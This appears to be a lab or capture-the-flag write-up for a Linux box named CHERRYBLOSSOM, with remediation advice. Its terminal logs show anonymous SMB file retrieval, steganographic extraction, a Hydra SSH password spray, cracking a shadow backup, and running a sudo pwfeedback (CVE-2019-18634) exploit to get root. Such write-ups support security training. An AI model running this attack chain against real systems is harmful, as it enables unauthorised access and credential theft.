SMB journal stego, SSH spray, and sudo pwfeedback overflow
Foundations Linux engagement: anonymous SMB journal decoded to PNG stego; cracked archives and a cherry-blossom wordlist unlocked lily then johan; CVE-2019-18634 pwfeedback overflow completed root.
- Case files
- SMB journal stego, SSH spray, and sudo pwfeedback overflow
Anonymous SMB journal → base64 PNG → stegpy zip chain → Hydra lily → shadow.bak crack to johan → sudo pwfeedback BOF to root.
journal.txt decoded to PNG; stegpy and zip repair recovered the CherryTree archive.
Hydra lily with cherry-blossom.list; shadow.bak cracked johan for su.
Enabled pwfeedback allowed a stack overflow to root.
Engagement summary
Anonymous SMB journal → base64 PNG → stegpy zip chain → Hydra lily → shadow.bak crack to johan → sudo pwfeedback BOF to root.
CHERRYBLOSSOM exposed SSH and Samba. Anonymous share held journal.txt — base64 of a PNG. stegpy extracted a malformed zip (JPEG magic patched to PK); offline crack opened a CherryTree journal and a cherry-blossom.list wordlist. Hydra against SSH recovered lily. A readable shadow.bak cracked johan’s hash with the same list (su johan; SSH as johan blocked). sudoers enabled pwfeedback; CVE-2019-18634 stack overflow (EDB / public PoC) yielded a root shell.
Business impact
Anonymous SMB file drops are credential and intel leaks. Custom wordlists from stolen journals defeat weak SSH secrets. pwfeedback in sudoers is a known local root — disable it and patch sudo past CVE-2019-18634.
Anonymous SMB and journal stego
journal.txt decoded to PNG; stegpy and zip repair recovered the CherryTree archive.
OPERATOR · SMB
savvy@lab:~$ nmap -sV -sC 10.48.176.208
22/tcp open ssh
139/tcp open netbios-ssn
445/tcp open microsoft-ds
savvy@lab:~$ smbclient //10.48.176.208/Anonymous -N -c 'get journal.txt'
savvy@lab:~$ base64 -d journal.txt > journal.png && stegpy journal.png
# extracts zip; fix local header magic if needed → crack → Journal.ctd
SSH lily and lateral to johan
Hydra lily with cherry-blossom.list; shadow.bak cracked johan for su.
OPERATOR · SSH
savvy@lab:~$ hydra -l lily -P cherry-blossom.list ssh://10.48.176.208
[22][ssh] host: 10.48.176.208 login: lily password: <cracked>
savvy@lab:~$ ssh lily@10.48.176.208
savvy@lab:~$
savvy@lab:~$ john shadow.bak -w=cherry-blossom.list && su - johan
savvy@lab:~$
sudo pwfeedback CVE-2019-18634
Enabled pwfeedback allowed a stack overflow to root.
OPERATOR · ROOT
savvy@lab:~$ sudo -l
# Defaults pwfeedback enabled
savvy@lab:~$ gcc -o exploit exploit.c && ./exploit
root@lab:~# id
uid=0(root) gid=0(root) groups=0(root)
Remediation
Disable anonymous SMB; encrypt journals at rest. Enforce strong unique SSH passwords or keys. Remove pwfeedback; keep sudo patched.